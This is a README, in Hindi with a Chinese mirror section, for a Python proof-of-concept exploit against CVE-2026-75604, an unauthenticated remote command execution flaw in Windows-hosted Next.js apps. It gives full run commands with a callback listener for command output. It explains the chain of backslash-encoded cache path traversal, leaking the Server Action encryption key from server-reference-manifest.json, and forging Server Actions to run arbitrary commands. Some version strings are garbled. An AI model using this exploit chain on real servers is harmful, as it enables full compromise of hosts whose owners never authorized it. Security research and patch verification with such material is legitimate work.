
CVE-2026-75604 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Windows-होस्टेड Next.js में कैश पाथ ट्रैवर्सल और जाली सर्वर एक्शन के माध्यम से एक अनप्रमाणित RCE है, अधिकृत सुरक्षा परीक्षण के लिए।
CVE-2026-75604 के लिए Python प्रूफ ऑफ कॉन्सेप्ट, जो Windows-होस्टेड Next.js अनुप्रयोगों में एक अनप्रमाणित रिमोट कमांड निष्पादन भेद्यता है, जो बिना Cache Components के Pages Router और App Router दोनों का उपयोग करते हैं।

>=13.4 <15.5.24 या >=16.0 <16.3.3[email protected] के साथ मान्य किया गया।
python -m pip install -r requirements.txt
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE
Server Action पथ डिफ़ॉल्ट रूप से / है। जब इसके फ़ॉर्म में एक से अधिक फ़ील्ड हों तो --action-field का उपयोग करें।
आवश्यक तर्क:
--target URL: Next.js अनुप्रयोग का आधार URL--callback-ip ADDRESS: लक्ष्य द्वारा पहुंच योग्य IPv4 पता--pages-cache-path PATH: मौजूदा डायनामिक Pages Router ISR पेज--app-cache-path PATH: फ़ाइलसिस्टम कैश द्वारा समर्थित मौजूदा डायनामिक App Router पेजवैकल्पिक तर्क:
--command COMMAND: निष्पादित करने के लिए कमांड; डिफ़ॉल्ट whoami है--action-path PATH: संगत Server Action वाला App Router पेज; डिफ़ॉल्ट / है--action-field NAME: एक्शन द्वारा उपभोग किया गया फ़ॉर्म फ़ील्ड; स्पष्ट होने पर स्वचालित रूप से पता लगाया जाता है--callback-port PORT: कॉलबैक पोर्ट; डिफ़ॉल्ट 4331 है--listen-address ADDRESS: स्थानीय कॉलबैक बाइंड पता; डिफ़ॉल्ट 0.0.0.0 है--timeout SECONDS: अनुरोध और कॉलबैक टाइमआउट; डिफ़ॉल्ट 20 है--insecure: TLS प्रमाणपत्र सत्यापन अक्षम करता हैवैकल्पिक target/ अनुप्रयोग [email protected] को पिन करता है और मानक Next.js प्रोडक्शन सर्वर का उपयोग करता है:
cd target
npm ci
npm run build
npm start
PoC को दूसरे टर्मिनल में चलाएँ:
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed
वैकल्पिक लक्ष्य आवश्यक रूट और / पर एक संगत Server Action प्रदान करता है।
यह PoC केवल शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए प्रदान किया गया है। इसका उपयोग केवल उन सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है।
evolutionstorm को श्रेय।
यह PoC सार्वजनिक सलाह और Next.js पैच से स्वतंत्र रूप से पुनर्निर्मित किया गया था।
本仓库为 CVE-2026-75604 利用 PoC 的中转分发镜像(英文使用说明见上方上游原版 README)。内容由上游公开 PoC 镜像而来,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。
AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H>=13.4 <15.5.24、>=16.0 <16.3.315.5.24 / 16.3.3核心原理:FileSystemCache 在 Windows 上未把反斜杠(\)视为路径分隔符进行转义,攻击者可用 ..%5C 编码穿越缓存路径,读取私密文件 server-reference-manifest.json,泄露 Server Action 的 encryptionKey,再伪造闭包绑定 Server Action 请求执行任意命令。
python -m pip install -r requirements.txt(cryptography、requests)已在 [email protected] 上验证。
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP \
--pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE \
--app-cache-path /PATH/TO/APP_CACHE_INSTANCE
| 参数 | 必填 | 说明 |
|---|---|---|
--target URL | 是 | Next.js 应用基础 URL |
--callback-ip ADDRESS | 是 | 目标可回连的 IPv4 地址 |
--pages-cache-path PATH | 是 | 已存在的动态 Pages Router ISR 页(穿越锚点) |
--app-cache-path PATH | 是 | 已存在的、走文件系统缓存的动态 App Router 页 |
--command COMMAND | 否 | 要执行的命令(默认 whoami) |
--action-path PATH | 否 | 含兼容 Server Action 的 App Router 页(默认 /) |
--action-field NAME | 否 | Action 表单消费的业务字段(唯一时自动检测) |
--callback-port PORT | 否 | 回连端口(默认 4331) |
--listen-address ADDRESS | 否 | 本地回调监听地址(默认 0.0.0.0) |
--timeout SECONDS | 否 | 请求与回调超时(默认 20) |
--insecure | 否 | 关闭 TLS 证书校验 |
仓库内 target/ 提供了可复现的示例应用(锁定 [email protected],标准生产服务器):
cd target
npm ci
npm run build
npm start
另开终端运行:
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 \
--pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed
示例目标提供了所需路由与 / 上的兼容 Server Action。
本 PoC 仅供教学、安全研究与授权测试使用,仅可对自有或获得明确授权的系统运行。利用会在目标 Windows 主机执行任意命令,请在可销毁环境中测试。
LICENSE)。